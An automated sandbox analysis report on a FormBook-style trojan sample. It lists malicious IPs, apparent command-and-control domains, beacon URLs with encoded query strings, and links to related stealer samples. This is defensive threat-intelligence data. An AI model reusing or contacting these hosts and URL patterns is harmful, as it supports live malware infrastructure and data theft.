                                                                                                    https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.chuanruhaomen.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.grupooceanique.com/ns03/www.repair-services.todayexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.grupooceanique.comReferer:explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.fichaphuman.netexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.beatricesswarthout.xyz/ns03/explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.agathis.fun/ns03/www.grupooceanique.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.fichaphuman.net/ns03/explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.agathis.funexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9kexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.chuanruhaomen.comReferer:explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.repair-services.today/ns03/www.taiyuanbaoyang.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.elizabethsbookshelf.com/ns03/www.leclandesparents.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown

                                                                                                                World Map of Contacted IPs

                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs

                                                                                                                Public IPs

                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                192.0.78.25
                                                                                                                		gildedbeautyaesthitics.comUnited States
                                                                                                                		2635AUTOMATTICUStrue
                                                                                                                172.67.171.253
                                                                                                                		www.beatricesswarthout.xyzUnited States
                                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                                172.67.146.200
                                                                                                                		www.repair-services.todayUnited States
                                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                                172.67.160.57
                                                                                                                		www.taiyuanbaoyang.comUnited States
                                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                                15.197.142.173
                                                                                                                		maxhealthunity.comUnited States
                                                                                                                		7430TANDEMUStrue
                                                                                                                208.91.197.27
                                                                                                                		www.scheuermannworks.comVirgin Islands (BRITISH)
                                                                                                                		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                104.21.23.10
                                                                                                                		www.agathis.funUnited States
                                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                                216.40.34.41
                                                                                                                		www.velvetgloveseasonings.storeCanada
                                                                                                                		15348TUCOWSCAtrue

                                                                                                                General Information

                                                                                                                Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                Analysis ID:1410995
                                                                                                                Start date and time:2024-03-18 14:40:20 +01:00
                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                Overall analysis duration:0h 11m 11s
                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                Report type:full
                                                                                                                Cookbook file name:default.jbs
                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                Number of analysed new started processes analysed:12
                                                                                                                Number of new started drivers analysed:0
                                                                                                                Number of existing processes analysed:0
                                                                                                                Number of existing drivers analysed:0
                                                                                                                Number of injected processes analysed:1
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • AMSI enabled
                                                                                                                Analysis Mode:default
                                                                                                                Analysis stop reason:Timeout
                                                                                                                Sample name:duGqHKp0OUXaX1D.exe
                                                                                                                Detection:MAL
                                                                                                                Classification:mal100.troj.evad.winEXE@144/1@11/8
                                                                                                                EGA Information:
                                                                                                                • Successful, ratio: 100%
                                                                                                                HCA Information:
                                                                                                                • Successful, ratio: 100%
                                                                                                                • Number of executed functions: 104
                                                                                                                • Number of non-executed functions: 285
                                                                                                                Cookbook Comments:
                                                                                                                • Found application associated with file extension: .exe
                                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                Warnings

                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                • VT rate limit hit for: duGqHKp0OUXaX1D.exe

                                                                                                                Simulations

                                                                                                                Behavior and APIs

                                                                                                                TimeTypeDescription
                                                                                                                14:41:09API Interceptor1x Sleep call for process: duGqHKp0OUXaX1D.exe modified
                                                                                                                14:41:19API Interceptor7498991x Sleep call for process: explorer.exe modified
                                                                                                                14:41:57API Interceptor7641785x Sleep call for process: help.exe modified

                                                                                                                Joe Sandbox View / Context

                                                                                                                IPs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                192.0.78.25International Bank Transfer.exeGet hashmaliciousFormBookBrowse
                                                                                                                • www.voyagedebetterave.com/ve92/?KVvTZtEp=SKXwm0mP5osv+tB3n7pxaJIuZ2gns/beRRSaI9loB4VQNRcKjWpGz3LlPIL/LOa7b1KdZakZ+A==&ixo=GL0X
                                                                                                                NfNXiX42uQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                • www.burduremlakilan.com/jk56/?ndfxyf=R2Jd4&Jd7H=vUHa4t/MdhdOwuVCvD8uyvIDFi6LExMKoOKM/kOuD2lIQwvS7J46LAC2Okr9THJErjNM
                                                                                                                Factura_de_proforma_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                • www.slimshotonline.com/ey16/?xnMtsxw8=A/o10+Me4fvA+hta8k/hrhXphMSeIGQKvha56Qk62/qkqyp619OkBa+Em/4N0fL2+Mt4Err+Lw==&1bkpfB=R2MxBTeXnBq
                                                                                                                jYRjr28sHR.exeGet hashmaliciousFormBookBrowse
                                                                                                                • www.lajtuf.com/bp31/
                                                                                                                PGiUp8uqGt.exeGet hashmaliciousFormBookBrowse
                                                                                                                • www.illuminati4me.com/btrd/?2dz=odelT&-Z1dnr=Q3kWi+8g+tbDAN4znzTYQaSHZDljXDmr3SwP0PohYWX18fCHdmrKk2iHJyaTwrNQ+JWy
                                                                                                                JLavGK0bZb.exeGet hashmaliciousFormBookBrowse
                                                                                                                • www.lithuaniandreamtime.com/4hc5/?VJEp=utxH9pwhq8XTGdt&FR3pw2=cbyLg/+yG8SQmnyN+ojfiN3a+JzSxQPEYaknOMddy8kPHpC/VJwUPcNk7jURfSy4thzO4h4zNA==
                                                                                                                qn69nWdSQs.exeGet hashmaliciousFormBookBrowse
                                                                                                                • www.illuminati4me.com/btrd/?DJE00XC=Q3kWi+8g+tbDAN4znzTYQaSHZDljXDmr3SwP0PohYWX18fCHdmrKk2iHJx6M7Ldokur4&pN9=DXj4tZAh6XiT_JF
                                                                                                                Ordem_de_compra_#PO358.exeGet hashmaliciousFormBookBrowse
                                                                                                                • www.slimshotonline.com/ey16/?xZED=A/o10+Me4fvA+hta8k/hrhXphMSeIGQKvha56Qk62/qkqyp619OkBa+Em/004+n2pKxp&E8bHr=NjqDiB6XRrFpUP
                                                                                                                SWIIFT_221036299-043825-sanlccjavap0004.xlsGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                • www.vistcreative.com/sy22/?6lh=MtSt0iztHN3GKhdkHdf88FVArVLYEx1rV+/lL67m6SbcpzMOPDKVfhJUxuw/Sb7h3bDxFQ==&5j5x=ur84vpqh7Z-XcvGp
                                                                                                                H66BPNLUSu.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                • www.wereadqueerbooks.com/fg83/?TBxHarK=GZJkuPUqlQ7mEH/3syR+9tqbc80qt/Xiv8iSRhWNxBqWulmFmlrwv3Pha3WY5QzmsBpI&7n=AfmPrpK08nwl5
                                                                                                                172.67.171.2539nncBfTB8Kjm7ge.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                • www.beatricesswarthout.xyz/ns03/?DTdTP=VQsc4N5v0Qb/taRRMjFMH1qaQdoag+l2H1v4gotC687CaJU5axHSv4xTKA+tCLthbykq&jhIpS=Vhct
                                                                                                                SA3f1R5Kpq.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                • volkstera.fun/api
                                                                                                                172.67.160.57https://share.formbold.com/3djRrGet hashmaliciousUnknownBrowse
                                                                                                                  15.197.142.173D05285734 DHL.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.rutgersorthopedics.com/kh11/?lnPhO=Iip38xbzW4Vl0cZT3E/lr35AfwmEn4iBqZL8fJqzX17FY9279t6Q8c1Vq41DoUwLL209&2d=1bqlVz20oD7h_jl
                                                                                                                  Documento de solicitacao de pedido No 158645080.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • www.nordens-media.com/pz08/?UN=0paP1db0Y&uZCx=32Qm6Ke2HKMNxWuGOo4gUstP0NhHa1GW0Wc3g6Bmqj6dA0nbRKEtQTutVN3cyf6M+aXy
                                                                                                                  Confirm.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • www.emsculptcenterofne.com/he2a/?t4=nhNBuRlcN2LBUz/tqG7X18Db1Kxbenb5b3vHQO2tFDH+XtD98Je8GVRwkF5SAfIuZ1Yu&SX=V8KDzvsP
                                                                                                                  Solicitud de pedido Documento No 168646080.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • www.nordens-media.com/pz08/?cx=32Qm6Ke2HKMNxWuGOo4gUstP0NhHa1GW0Wc3g6Bmqj6dA0nbRKEtQTutVOb61eG0z72pbUCjvw==&CR=_DHhAtX
                                                                                                                  mRWU3uqJ2O.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.quickfibrokers.com/pz08/?Tp=HBipkFZhs6F0s&QrKPp0c=FGzpPczua9V5Fhp0KyeSYZEXQ8ThSiWTqmgy8xu2EJQTOQiKwoJBowNtdQTGdZeSbR5L
                                                                                                                  DHL Factura Electronica Pendiente documento No 04BB25083.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • www.quickfibrokers.com/pz08/?Ap=FGzpPczua9V5Fhp0KyeSYZEXQ8ThSiWTqmgy8xu2EJQTOQiKwoJBowNtdQHJGs6scj9G&N6Ahw=3ffl2F0Punah42
                                                                                                                  MCYq2AqNU0.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                                                                                  • veselcontractors.com/pma/
                                                                                                                  rEncomendarPDF.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • www.magiccarpet-ride.com/ge22/?GxoX=5+uINVVgHWl4OpIYki5JTJ8/JA9Xhhy7bPh3OZNS8e32NQo31PLkDzGWAjp7srORSYYgrbq6bw==&xVZpGL=6l3Df6RXzhnPD
                                                                                                                  O4FR7BTmYq.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                  • www.soundmoneymiles.com/cg86/
                                                                                                                  qUGJZ4Ih2v.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.tryscriptify.com/gy14/?Ylg8g4Ap=4JZiO/K9dKDZpUKGlDNe0/6pZOUW7vCSruOjW8aGne4X7Ok9IXpluEcnNjb2dUCVfwxE&Thct=Dxlpdbhpx

                                                                                                                  Domains

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  www.scheuermannworks.comiU3WGoA77BdiFdA.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 208.91.197.27
                                                                                                                  www.beatricesswarthout.xyz9nncBfTB8Kjm7ge.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • 172.67.171.253
                                                                                                                  www.agathis.fun9nncBfTB8Kjm7ge.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • 104.21.23.10

                                                                                                                  ASNs

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  AUTOMATTICUShttps://www.fmsl.net/wp-content/uploads/2020/08/Welker_Logo_RGB.pngGet hashmaliciousUnknownBrowse
                                                                                                                  • 192.0.76.3
                                                                                                                  https://dataintegration.info/simplify-vm-migrations-with-migrate-for-compute-engine-as-a-serviceGet hashmaliciousUnknownBrowse
                                                                                                                  • 192.0.73.2
                                                                                                                  https://www.fzhla.cn/Get hashmaliciousUnknownBrowse
                                                                                                                  • 192.0.73.2
                                                                                                                  https://yvuy3.sa.com/userdashboard/excel.htmlGet hashmaliciousUnknownBrowse
                                                                                                                  • 192.0.77.48
                                                                                                                  https://vk39fk6q.r.eu-west-1.awstrack.me/L0/https:%2F%2Fwww.it-supportdesk.com%2Fsignin%3Ft=eyJhbGciOiJIUzI1NiJ9.eyJ0cmFja2luZ190b2tlbiI6ImM1MTBjMTIzLWY0ZDItNDgxNy04MjA3LTQyMTc5NjQ5ZjM0ZCIsImNlbGwiOiJodHRwczovLzIxZzZqZnZoeTYuZXhlY3V0ZS1hcGkudXMtZWFzdC0yLmFtYXpvbmF3cy5jb20vcHJvZC9hcGkvcGhpc2hpbmdjYW1wYWlnbiIsImNhbXBhaWduX3Rva2VuIjoiYzlmZDg1MjktNmU3OS00Mjg0LThlMDctMDE4YzA2MzRiNzBkIiwidGVzdF90b2tlbiI6ZmFsc2UsImV4dGVybmFsX3RyYWluaW5nIjpmYWxzZSwiaWF0IjoxNzEwNTIxNzkzLCJpc3MiOiJodHRwczovL2FwcC5waGlzaHRocmVhdC5jb20iLCJleHAiOjE3MTgyOTc3OTN9.acbxJAWf0gH2wdXpoYLdPMMH8ddjGDb0yI_pv5M44Cw/1/0102018e430b3dbc-87181efe-fa71-4ae3-935b-34f82c73479a-000000/V5ckyifVczO4_hRJyU_Z-0zviGk=365Get hashmaliciousUnknownBrowse
                                                                                                                  • 192.0.66.2
                                                                                                                  https://vk39fk6q.r.eu-west-1.awstrack.me/L0/https:%2F%2Fwww.it-supportdesk.com%2Fsignin%3Ft=eyJhbGciOiJIUzI1NiJ9.eyJ0cmFja2luZ190b2tlbiI6ImM1MTBjMTIzLWY0ZDItNDgxNy04MjA3LTQyMTc5NjQ5ZjM0ZCIsImNlbGwiOiJodHRwczovLzIxZzZqZnZoeTYuZXhlY3V0ZS1hcGkudXMtZWFzdC0yLmFtYXpvbmF3cy5jb20vcHJvZC9hcGkvcGhpc2hpbmdjYW1wYWlnbiIsImNhbXBhaWduX3Rva2VuIjoiYzlmZDg1MjktNmU3OS00Mjg0LThlMDctMDE4YzA2MzRiNzBkIiwidGVzdF90b2tlbiI6ZmFsc2UsImV4dGVybmFsX3RyYWluaW5nIjpmYWxzZSwiaWF0IjoxNzEwNTIxNzkzLCJpc3MiOiJodHRwczovL2FwcC5waGlzaHRocmVhdC5jb20iLCJleHAiOjE3MTgyOTc3OTN9.acbxJAWf0gH2wdXpoYLdPMMH8ddjGDb0yI_pv5M44Cw/1/0102018e430b3dbc-87181efe-fa71-4ae3-935b-34f82c73479a-000000/V5ckyifVczO4_hRJyU_Z-0zviGk=365Get hashmaliciousUnknownBrowse
                                                                                                                  • 192.0.66.2
                                                                                                                  https://vk39fk6q.r.eu-west-1.awstrack.me/L0/https:%2F%2Fwww.it-supportdesk.com%2Fsignin%3Ft=eyJhbGciOiJIUzI1NiJ9.eyJ0cmFja2luZ190b2tlbiI6ImM1MTBjMTIzLWY0ZDItNDgxNy04MjA3LTQyMTc5NjQ5ZjM0ZCIsImNlbGwiOiJodHRwczovLzIxZzZqZnZoeTYuZXhlY3V0ZS1hcGkudXMtZWFzdC0yLmFtYXpvbmF3cy5jb20vcHJvZC9hcGkvcGhpc2hpbmdjYW1wYWlnbiIsImNhbXBhaWduX3Rva2VuIjoiYzlmZDg1MjktNmU3OS00Mjg0LThlMDctMDE4YzA2MzRiNzBkIiwidGVzdF90b2tlbiI6ZmFsc2UsImV4dGVybmFsX3RyYWluaW5nIjpmYWxzZSwiaWF0IjoxNzEwNTIxNzkzLCJpc3MiOiJodHRwczovL2FwcC5waGlzaHRocmVhdC5jb20iLCJleHAiOjE3MTgyOTc3OTN9.acbxJAWf0gH2wdXpoYLdPMMH8ddjGDb0yI_pv5M44Cw/1/0102018e430b3dbc-87181efe-fa71-4ae3-935b-34f82c73479a-000000/V5ckyifVczO4_hRJyU_Z-0zviGk=365Get hashmaliciousUnknownBrowse
                                                                                                                  • 192.0.66.2
                                                                                                                  https://www.thestarnewstoday.com/Get hashmaliciousUnknownBrowse
                                                                                                                  • 192.0.66.184
                                                                                                                  https://carson.com/customers/software/Get hashmaliciousUnknownBrowse
                                                                                                                  • 192.0.76.3
                                                                                                                  https://www.fyfgyzo.cn/Get hashmaliciousUnknownBrowse
                                                                                                                  • 192.0.73.2
                                                                                                                  CLOUDFLARENETUSClear-EasyPrint.b7002.ntclear.top.SK008.ch.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 172.64.41.3
                                                                                                                  ekstre_pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  FVN001-230824.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  Quote.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 104.21.56.165
                                                                                                                  PI.1.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  proforma_Invoice_0009300_74885959969_9876.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 104.21.67.152
                                                                                                                  QUOTE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  Quotation lists.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  SOA FEB 2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  gMCSnfJRqp.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 172.67.169.232
                                                                                                                  CLOUDFLARENETUSClear-EasyPrint.b7002.ntclear.top.SK008.ch.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 172.64.41.3
                                                                                                                  ekstre_pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  FVN001-230824.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  Quote.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 104.21.56.165
                                                                                                                  PI.1.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  proforma_Invoice_0009300_74885959969_9876.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 104.21.67.152
                                                                                                                  QUOTE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  Quotation lists.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  SOA FEB 2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  gMCSnfJRqp.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 172.67.169.232
                                                                                                                  CLOUDFLARENETUSClear-EasyPrint.b7002.ntclear.top.SK008.ch.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 172.64.41.3
                                                                                                                  ekstre_pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  FVN001-230824.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  Quote.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 104.21.56.165
                                                                                                                  PI.1.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  proforma_Invoice_0009300_74885959969_9876.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 104.21.67.152
                                                                                                                  QUOTE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  Quotation lists.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  SOA FEB 2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  gMCSnfJRqp.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 172.67.169.232
                                                                                                                  TANDEMUS1xGvWmAmvc.elfGet hashmaliciousUnknownBrowse
                                                                                                                  • 15.219.33.195
                                                                                                                  USeZCMmN0v.elfGet hashmaliciousUnknownBrowse
                                                                                                                  • 128.88.223.187
                                                                                                                  http://diy94imq.duckdns.org/Get hashmaliciousUnknownBrowse
                                                                                                                  • 15.197.206.21
                                                                                                                  http://herwi7yd4.duckdns.org/Get hashmaliciousUnknownBrowse
                                                                                                                  • 15.197.206.21
                                                                                                                  http://ddqcsl2x.duckdns.org/Get hashmaliciousUnknownBrowse
                                                                                                                  • 15.197.206.21
                                                                                                                  SpsdYiAti9.elfGet hashmaliciousMiraiBrowse
                                                                                                                  • 128.88.14.230
                                                                                                                  https://mail.msmjmlr.top/Get hashmaliciousUnknownBrowse
                                                                                                                  • 15.197.193.217
                                                                                                                  https://brandequity.economictimes.indiatimes.com/etl.php?url=//zerpcon.com/nxgtnrtn/imgsdoll#ZnJvdGlyb3RpQGFzc25hdC5xYy5jYQ==Get hashmaliciousUnknownBrowse
                                                                                                                  • 15.197.193.217
                                                                                                                  https://flow.page/laapc.comGet hashmaliciousUnknownBrowse
                                                                                                                  • 15.197.193.217
                                                                                                                  https://ibit.ly/odettGet hashmaliciousUnknownBrowse
                                                                                                                  • 15.197.193.217

                                                                                                                  JA3 Fingerprints

                                                                                                                  No context

                                                                                                                  Dropped Files

                                                                                                                  No context

                                                                                                                  Created / dropped Files

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\duGqHKp0OUXaX1D.exe.log

                                                                                                                  Download File
